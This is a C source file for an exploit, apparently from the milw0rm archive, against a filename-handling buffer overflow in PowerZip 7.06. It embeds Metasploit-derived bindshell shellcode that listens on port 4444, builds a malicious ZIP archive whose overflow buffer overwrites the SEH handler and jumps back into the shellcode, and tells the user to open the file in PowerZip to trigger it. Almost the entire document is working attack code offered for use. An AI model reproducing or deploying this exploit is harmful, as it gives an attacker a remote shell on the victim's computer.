PowerZip 7.06.38950 - 'Filename Handling' Local Buffer Overflow

/*
PowerZip 7.06 Exploit by bratax (http://www.bratax.be/)

Just a quick one as I was able to reuse most of my zipcentral eploit code..
Greetz to everyone I like...(special greetz to mobbie and DT as they were sad
I didn't mention them the previous time :p)

******************************

Some technical info:
- Original advisory + vulnerability details are available here:
  http://vuln.sg/powerzip706-en.html (I didn't notice anything like DEP tho?)
- some code might look weird in this source.. (e.g. shellcode, offsets,...)
  this is because a lot of values are changed in memory.. so use your favorite
  debugger to see the real values and codes
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)
 !! sometimes it works, sometimes it doesn't... (throws exception E06D7363 when
    it doesn't)... just try over and over and over..... and over.... and over...
    and over again till it works.. :p sometimes it works 10 times in a row and
    sometimes you have to try 10 times before it works 1 time.. I'm going to
    investigate this weekend why this is happening.. but now it's time to relax
    and drink some beers :)

*/

#include <stdio.h>
#include <string.h>

unsigned char scode[]=      //bindshell on p4444 (thx metasploit)
"\x89\x03\x59\x89\x05\x8a\x9b\x98\x98\x98\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x38"
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x52\x45\x57\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x52\x4b\x58"
"\x49\x48\x4e\x56\x46\x32\x4e\x31\x41\x36\x43\x4c\x41\x43\x4b\x4d"
"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x48\x42\x44\x4e\x50\x4b\x38"
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x45\x4a\x36"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"
"\x43\x45\x48\x56\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x37\x43\x37"
"\x44\x43\x4f\x55\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x35\x43\x35\x43\x35\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x41"
"\x4e\x45\x48\x56\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"
"\x4c\x31\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d"
"\x42\x35\x46\x55\x46\x55\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x57\x47\x45\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x36\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x48\x45\x4e\x4c\x46\x42\x45\x49\x35\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x52"
"\x43\x39\x4d\x38\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x37\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x45\x41\x35\x4c\x36"
"\x41\x30\x41\x55\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";


char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
			 "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00"
			 "\x00\x00\x00\x00\x00\x00\x14\x08\x00";
char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
				"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34"
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
				"\x00\x00\x14\x08\x00\x00\x00\x00\x00\x00"
				"\x01\x00\x24\x00\x00\x00\x00\x00\x00";
char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"
			 "\x00\x00\x01\x00\x01\x00\x42\x08\x00\x00"
			 "\x32\x08\x00\x00\x00";

int main(int argc,char *argv[])
{
	char overflow[2064]; // exactly 2064....... wonder why?

FILE *vuln;
if(argc == 1)
{
    printf("PowerZip 7.06 Buffer Overflow Exploit.\n");
    printf("Coded by bratax (http://www.bratax.be/).\n");
    printf("Usage: %s <outputfile>\n",argv[0]);
    return 0;
}
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x32,sizeof(overflow)); //fill with crap
//memcpy(overflow+787, scode, 483);
memcpy(overflow+787, scode, 709);
memcpy(overflow+1620, "\x41\x49\x89\x04", 4); // jmp over pop pop ret
memcpy(overflow+1624, "\x02\x12\x01\x61", 4); // pop pop ret @ 0x61011202
memcpy(overflow+1628, "\x82\xFD\x81\x98\x98", 5); // jmp back to shellcode


if(vuln)
{
    //Write file
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(middle, 1, sizeof(middle), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(tail, 1, sizeof(tail), vuln);
    fclose(vuln);
}
printf("File written.\nOpen with PowerZip 7.06 to exploit.\n");
return 0;
}

// milw0rm.com [2006-09-01]